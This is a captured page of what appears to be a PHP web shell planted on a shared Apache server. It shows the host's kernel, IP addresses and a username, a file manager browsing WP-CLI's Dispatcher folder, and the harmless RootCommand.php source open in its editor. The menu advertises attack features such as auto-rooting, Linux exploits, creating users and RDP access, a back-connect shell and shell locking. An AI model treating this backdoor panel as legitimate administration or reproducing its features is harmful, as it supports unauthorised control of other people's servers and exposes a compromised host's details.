Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
php /
WP_CLI /
Dispatcher /
[ HOME SHELL ]
Name
Size
Permission
Action
CommandAddition.php
1.03
KB
-rw-r--r--
CommandFactory.php
8.67
KB
-rw-r--r--
CommandNamespace.php
1.17
KB
-rw-r--r--
CompositeCommand.php
7.28
KB
-rw-r--r--
RootCommand.php
843
B
-rw-r--r--
Subcommand.php
13.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RootCommand.php
<?php namespace WP_CLI\Dispatcher; use WP_CLI\Utils; /** * The root node in the command tree. * * @package WP_CLI */ class RootCommand extends CompositeCommand { public function __construct() { $this->parent = false; $this->name = 'wp'; $this->shortdesc = 'Manage WordPress through the command-line.'; } /** * Get the human-readable long description. * * @return string */ public function get_longdesc() { return $this->get_global_params( true ); } /** * Find a subcommand registered on the root * command. * * @param array $args * @return Subcommand|false */ public function find_subcommand( &$args ) { $command = array_shift( $args ); Utils\load_command( $command ); if ( ! isset( $this->subcommands[ $command ] ) ) { return false; } return $this->subcommands[ $command ]; } }
Close